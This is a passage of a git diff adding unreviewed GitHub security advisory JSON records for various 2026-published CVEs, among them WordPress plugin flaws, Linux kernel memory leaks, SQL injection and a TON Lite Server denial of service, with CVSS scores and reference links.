to monopolize the Lite Server's processing power, significantly reducing its throughput and causing a denial of service for legitimate users acting through the gateway.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-70957" + }, + { + "type": "WEB", + "url": "https://github.com/ton-blockchain/ton/commit/e35b34de22109596a54d1357dcce92d63002ba95" + }, + { + "type": "WEB", + "url": "https://gist.github.com/Lucian-code233/d2589ece39914195c0e307b4dee32185" + }, + { + "type": "WEB", + "url": "https://mp.weixin.qq.com/s/KT4RKNey_mjU2kBWpGTjuw" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-674" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-13T22:16:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-rw72-9mv7-cr6q/GHSA-rw72-9mv7-cr6q.json b/advisories/unreviewed/2026/02/GHSA-rw72-9mv7-cr6q/GHSA-rw72-9mv7-cr6q.json new file mode 100644 index 0000000000000..94f7243bbb7de --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-rw72-9mv7-cr6q/GHSA-rw72-9mv7-cr6q.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rw72-9mv7-cr6q", + "modified": "2026-02-19T18:31:52Z", + "published": "2026-02-19T18:31:52Z", + "aliases": [ + "CVE-2026-25343" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in VeronaLabs WP SMS wp-sms allows DOM-Based XSS.This issue affects WP SMS: from n/a through <= 7.1.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25343" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/wp-sms/vulnerability/wordpress-wp-sms-plugin-7-1-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T09:16:18Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-rwc9-h9mh-xfwq/GHSA-rwc9-h9mh-xfwq.json b/advisories/unreviewed/2026/02/GHSA-rwc9-h9mh-xfwq/GHSA-rwc9-h9mh-xfwq.json new file mode 100644 index 0000000000000..9cfcb65bb0dcc --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-rwc9-h9mh-xfwq/GHSA-rwc9-h9mh-xfwq.json @@ -0,0 +1,33 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rwc9-h9mh-xfwq", + "modified": "2026-02-14T18:30:14Z", + "published": "2026-02-14T18:30:14Z", + "aliases": [ + "CVE-2026-23137" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nof: unittest: Fix memory leak in unittest_data_add()\n\nIn unittest_data_add(), if of_resolve_phandles() fails, the allocated\nunittest_data is not freed, leading to a memory leak.\n\nFix this by using scope-based cleanup helper __free(kfree) for automatic\nresource cleanup. This ensures unittest_data is automatically freed when\nit goes out of scope in error paths.\n\nFor the success path, use retain_and_null_ptr() to transfer ownership\nof the memory to the device tree and prevent double freeing.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23137" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/235a1eb8d2dcc49a6cf0a5ee1aa85544a5d0054b" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/f09b0f705bd7197863b90256ef533a6414d1db2c" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-14T16:15:53Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-rwf8-6fj2-4vrx/GHSA-rwf8-6fj2-4vrx.json b/advisories/unreviewed/2026/02/GHSA-rwf8-6fj2-4vrx/GHSA-rwf8-6fj2-4vrx.json new file mode 100644 index 0000000000000..d1af0c5a66305 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-rwf8-6fj2-4vrx/GHSA-rwf8-6fj2-4vrx.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rwf8-6fj2-4vrx", + "modified": "2026-02-18T21:31:23Z", + "published": "2026-02-18T21:31:23Z", + "aliases": [ + "CVE-2026-2663" + ], + "details": "A security vulnerability has been detected in Alixhan xh-admin-backend up to 1.7.0. This issue affects some unknown processing of the file /frontend-api/system-service/api/system/role/query of the component Database Query Handler. Such manipulation of the argument prop leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2663" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.346461" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.346461" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.753225" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-74" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T20:18:36Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-rwhg-vqv9-mjpv/GHSA-rwhg-vqv9-mjpv.json b/advisories/unreviewed/2026/02/GHSA-rwhg-vqv9-mjpv/GHSA-rwhg-vqv9-mjpv.json new file mode 100644 index 0000000000000..5e23b8b1977f1 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-rwhg-vqv9-mjpv/GHSA-rwhg-vqv9-mjpv.json @@ -0,0 +1,49 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rwhg-vqv9-mjpv", + "modified": "2026-02-14T18:30:16Z", + "published": "2026-02-14T18:30:16Z", + "aliases": [ + "CVE-2026-23182" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nspi: tegra: Fix a memory leak in tegra_slink_probe()\n\nIn tegra_slink_probe(), when platform_get_irq() fails, it directly\nreturns from the function with an error code, which causes a memory leak.\n\nReplace it with a goto label to ensure proper cleanup.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23182" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/075415ae18b5b3e4d0187962d538653154216fe7" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/126a09f4fcd2b895a818ca43fde078d907c1ac9a" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/327b71326cc1834bc031e8f52a470a18dfd9caa6" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/41d9a6795b95d6ea28439ac1e9ce8c95bbca20fc" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/6a04dc650cef8d52a1ccb4ae245dbe318ffff32e" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/b8eec12aa666c11f8a6ad1488c568f85c58875fa" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-14T17:15:55Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-rww7-gq38-qv2c/GHSA-rww7-gq38-qv2c.json b/advisories/unreviewed/2026/02/GHSA-rww7-gq38-qv2c/GHSA-rww7-gq38-qv2c.json new file mode 100644 index 0000000000000..493e90832ff67 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-rww7-gq38-qv2c/GHSA-rww7-gq38-qv2c.json @@ -0,0 +1,60 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rww7-gq38-qv2c", + "modified": "2026-02-19T18:31:50Z", + "published": "2026-02-19T18:31:49Z", + "aliases": [ + "CVE-2025-14270" + ], + "details": "The OneClick Chat to Order plugin for WordPress is vulnerable to authorization bypass in versions up to, and including, 1.0.9. This is due to the plugin not properly verifying that a user is authorized to perform an action in the wa_order_number_save_number_field function. This makes it possible for authenticated attackers, with Editor-level access and above, to modify WhatsApp phone numbers used by the plugin, redirecting customer orders and messages to attacker-controlled phone numbers.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-14270" + }, + { + "type": "WEB", + "url": "https://cwe.mitre.org/data/definitions/862.html" + }, + { + "type": "WEB", + "url": "https://developer.wordpress.org/plugins/security/checking-user-capabilities" + }, + { + "type": "WEB", + "url": "https://developer.wordpress.org/plugins/security/nonces" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/oneclick-whatsapp-order/tags/1.0.9/includes/multiple-numbers.php#L156" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/oneclick-whatsapp-order/tags/1.0.9/includes/multiple-numbers.php#L26" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3417664%40oneclick-whatsapp-order&new=3417664%40oneclick-whatsapp-order&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/b4b5cc5e-af82-49e0-a0b5-d27c3631a102?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T07:17:34Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-rx38-cw65-cmwp/GHSA-rx38-cw65-cmwp.json b/advisories/unreviewed/2026/02/GHSA-rx38-cw65-cmwp/GHSA-rx38-cw65-cmwp.json new file mode 100644 index 0000000000000..1769c08ffd852 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-rx38-cw65-cmwp/GHSA-rx38-cw65-cmwp.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rx38-cw65-cmwp", + "modified": "2026-02-20T00:31:53Z", + "published": "2026-02-20T00:31:53Z", + "aliases": [ + "CVE-2026-21535" + ], + "details": "Improper access control in Microsoft Teams allows an unauthorized attacker to disclose information over a network.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-21535" + }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21535" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-284" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T23:16:24Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-rx9j-2fmr-2gqf/GHSA-rx9j-2fmr-2gqf.json b/advisories/unreviewed/2026/02/GHSA-rx9j-2fmr-2gqf/GHSA-rx9j-2fmr-2gqf.json new file mode 100644 index 0000000000000..967577b0f22d0 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-rx9j-2fmr-2gqf/GHSA-rx9j-2fmr-2gqf.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rx9j-2fmr-2gqf", + "modified": "2026-02-11T15:30:27Z", + "published": "2026-02-11T15:30:27Z", + "aliases": [ + "CVE-2019-25307" + ], + "details": "WorkgroupMail 7.5.1 contains an unquoted service path vulnerability in its Windows service configuration that allows local attackers to potentially execute arbitrary code. Attackers can exploit the unquoted binary path to inject malicious executables that will be run with LocalSystem privileges during service startup.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25307" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47523" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/workgroupmail-workgroupmail-unquoted-service-path" + }, + { + "type": "WEB", + "url": "http://html.tucows.com/preview/195580/WorkgroupMail-Mail-Server?q=pop3" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-428" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T15:16:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-rxgx-jjvj-9w6v/GHSA-rxgx-jjvj-9w6v.json b/advisories/unreviewed/2026/02/GHSA-rxgx-jjvj-9w6v/GHSA-rxgx-jjvj-9w6v.json new file mode 100644 index 0000000000000..555d208a7ccf1 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-rxgx-jjvj-9w6v/GHSA-rxgx-jjvj-9w6v.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rxgx-jjvj-9w6v", + "modified": "2026-02-13T00:32:52Z", + "published": "2026-02-13T00:32:52Z", + "aliases": [ + "CVE-2019-25323" + ], + "details": "Heatmiser Netmonitor v3.03 contains an HTML injection vulnerability in the outputSetup.htm page that allows attackers to inject malicious HTML code through the outputtitle parameter. Attackers can craft specially formatted POST requests to the outputtitle parameter to execute arbitrary HTML and potentially manipulate the web interface's displayed content.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25323" + }, + { + "type": "WEB", + "url": "https://web.archive.org/web/20190724160628/https://www.heatmiser.com/en" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47828" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/heatmiser-netmonitor-html-injection" + }, + { + "type": "WEB", + "url": "https://www.zoneregeling.nl/heatmiser/netmonitor-handleiding.pdf" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-12T23:16:04Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-v3jv-jh9h-w9c8/GHSA-v3jv-jh9h-w9c8.json b/advisories/unreviewed/2026/02/GHSA-v3jv-jh9h-w9c8/GHSA-v3jv-jh9h-w9c8.json new file mode 100644 index 0000000000000..fc106bac900ca --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-v3jv-jh9h-w9c8/GHSA-v3jv-jh9h-w9c8.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-v3jv-jh9h-w9c8", + "modified": "2026-02-13T00:32:52Z", + "published": "2026-02-13T00:32:52Z", + "aliases": [ + "CVE-2019-25340" + ], + "details": "SpotAuditor 5.3.2 contains a denial of service vulnerability in its Base64 decryption feature that allows attackers to crash the application by supplying an oversized buffer. Attackers can generate a malformed input file with 2000 repeated characters to trigger an application crash when pasted into the Base64 Encrypted Password field.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25340" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47719" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/spotauditor-base-denial-of-service" + }, + { + "type": "WEB", + "url": "http://www.nsauditor.com" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-121" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-12T23:16:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-v3v9-r7ff-976x/GHSA-v3v9-r7ff-976x.json b/advisories/unreviewed/2026/02/GHSA-v3v9-r7ff-976x/GHSA-v3v9-r7ff-976x.json new file mode 100644 index 0000000000000..60aa9141202ef --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-v3v9-r7ff-976x/GHSA-v3v9-r7ff-976x.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-v3v9-r7ff-976x", + "modified": "2026-02-18T21:31:22Z", + "published": "2026-02-18T18:30:40Z", + "aliases": [ + "CVE-2025-70149" + ], + "details": "CodeAstro Membership Management System 1.0 is vulnerable to SQL Injection in print_membership_card.php via the ID parameter.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-70149" + }, + { + "type": "WEB", + "url": "https://www.phpscriptsonline.com/product/membership-management-software" + }, + { + "type": "WEB", + "url": "https://youngkevinn.github.io/posts/CVE-2025-70149-Membership-SQLi" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T17:21:36Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-v45v-r9m7-cwxg/GHSA-v45v-r9m7-cwxg.json b/advisories/unreviewed/2026/02/GHSA-v45v-r9m7-cwxg/GHSA-v45v-r9m7-cwxg.json new file mode 100644 index 0000000000000..6e0dbaec13c8d --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-v45v-r9m7-cwxg/GHSA-v45v-r9m7-cwxg.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-v45v-r9m7-cwxg", + "modified": "2026-02-19T21:30:45Z", + "published": "2026-02-19T18:31:52Z", + "aliases": [ + "CVE-2026-25372" + ], + "details": "Missing Authorization vulnerability in Kodezen LLC Academy LMS academy allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Academy LMS: from n/a through <= 3.5.3.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25372" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/academy/vulnerability/wordpress-academy-lms-plugin-3-5-3-broken-access-control-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T09:16:19Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-v4qp-mqxj-qxxf/GHSA-v4qp-mqxj-qxxf.json b/advisories/unreviewed/2026/02/GHSA-v4qp-mqxj-qxxf/GHSA-v4qp-mqxj-qxxf.json new file mode 100644 index 0000000000000..7aa7ccce96577 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-v4qp-mqxj-qxxf/GHSA-v4qp-mqxj-qxxf.json @@ -0,0 +1,25 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-v4qp-mqxj-qxxf", + "modified": "2026-02-13T21:31:39Z", + "published": "2026-02-13T21:31:39Z", + "aliases": [ + "CVE-2024-34154" + ], + "details": "Rejected reason: reserved but not needed", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-34154" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-13T21:16:12Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-v4x7-pcc8-pj6q/GHSA-v4x7-pcc8-pj6q.json b/advisories/unreviewed/2026/02/GHSA-v4x7-pcc8-pj6q/GHSA-v4x7-pcc8-pj6q.json new file mode 100644 index 0000000000000..b044806249268 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-v4x7-pcc8-pj6q/GHSA-v4x7-pcc8-pj6q.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-v4x7-pcc8-pj6q", + "modified": "2026-02-11T21:30:41Z", + "published": "2026-02-11T21:30:40Z", + "aliases": [ + "CVE-2020-37179" + ], + "details": "APKF Product Key Finder 2.5.8.0 contains a denial of service vulnerability that allows attackers to crash the application by overflowing the 'Name' input field. Attackers can generate a 1000-character payload and paste it into the registration name field to trigger an application crash.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-37179" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47937" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/apkf-product-key-finder-name-denial-of-service" + }, + { + "type": "WEB", + "url": "http://www.nsauditor.com" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-120" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T21:16:11Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-v5g8-2q7f-c524/GHSA-v5g8-2q7f-c524.json b/advisories/unreviewed/2026/02/GHSA-v5g8-2q7f-c524/GHSA-v5g8-2q7f-c524.json index 7618ec7972a42..82543f1d908da 100644 --- a/advisories/unreviewed/2026/02/GHSA-v5g8-2q7f-c524/GHSA-v5g8-2q7f-c524.json +++ b/advisories/unreviewed/2026/02/GHSA-v5g8-2q7f-c524/GHSA-v5g8-2q7f-c524.json @@ -58,7 +58,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-119" + "CWE-119", + "CWE-787" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2026/02/GHSA-v5m9-phxh-m6wj/GHSA-v5m9-phxh-m6wj.json b/advisories/unreviewed/2026/02/GHSA-v5m9-phxh-m6wj/GHSA-v5m9-phxh-m6wj.json new file mode 100644 index 0000000000000..8a0ac51f99a9b --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-v5m9-phxh-m6wj/GHSA-v5m9-phxh-m6wj.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-v5m9-phxh-m6wj", + "modified": "2026-02-13T00:32:52Z", + "published": "2026-02-13T00:32:52Z", + "aliases": [ + "CVE-2019-25337" + ], + "details": "OwnCloud 8.1.8 contains a username enumeration vulnerability that allows remote attackers to discover user accounts by manipulating the share.php endpoint. Attackers can send crafted GET requests to /index.php/core/ajax/share.php with a wildcard search parameter to retrieve comprehensive user information.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25337" + }, + { + "type": "WEB", + "url": "https://ftp.icm.edu.pl/packages/owncloud" + }, + { + "type": "WEB", + "url": "https://owncloud.org" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47745" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/owncloud-username-disclosure" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-203" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-12T23:16:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-v66c-4xgf-59c7/GHSA-v66c-4xgf-59c7.json b/advisories/unreviewed/2026/02/GHSA-v66c-4xgf-59c7/GHSA-v66c-4xgf-59c7.json new file mode 100644 index 0000000000000..0f8120f22758c --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-v66c-4xgf-59c7/GHSA-v66c-4xgf-59c7.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-v66c-4xgf-59c7", + "modified": "2026-02-12T15:32:43Z", + "published": "2026-02-11T18:31:29Z", + "aliases": [ + "CVE-2025-65128" + ], + "details": "A missing authentication mechanism in the web management API components of Shenzhen Zhibotong Electronics ZBT WE2001 23.09.27 allows unauthenticated attackers on the local network to modify router and network configurations. By invoking operations whose names end with \"*_nocommit\" and supplying the parameters expected by the invoked function, an attacker can change configuration data, including SSID, Wi-Fi credentials, and administrative passwords, without authentication or an existing session.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-65128" + }, + { + "type": "WEB", + "url": "https://neutsec.io/advisories/cve-2025-65128" + }, + { + "type": "WEB", + "url": "https://www.zbtwifi.com" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-287" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T18:16:04Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-v6hg-mv73-76vg/GHSA-v6hg-mv73-76vg.json b/advisories/unreviewed/2026/02/GHSA-v6hg-mv73-76vg/GHSA-v6hg-mv73-76vg.json new file mode 100644 index 0000000000000..182d0a2ed7e47 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-v6hg-mv73-76vg/GHSA-v6hg-mv73-76vg.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-v6hg-mv73-76vg", + "modified": "2026-02-19T18:31:51Z", + "published": "2026-02-19T18:31:51Z", + "aliases": [ + "CVE-2026-23803" + ], + "details": "Server-Side Request Forgery (SSRF) vulnerability in Burhan Nasir Smart Auto Upload Images smart-auto-upload-images allows Server Side Request Forgery.This issue affects Smart Auto Upload Images: from n/a through <= 1.2.2.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23803" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/smart-auto-upload-images/vulnerability/wordpress-smart-auto-upload-images-plugin-1-2-2-server-side-request-forgery-ssrf-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-918" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T09:16:13Z" + } +} \ No newline at end of file diff --git 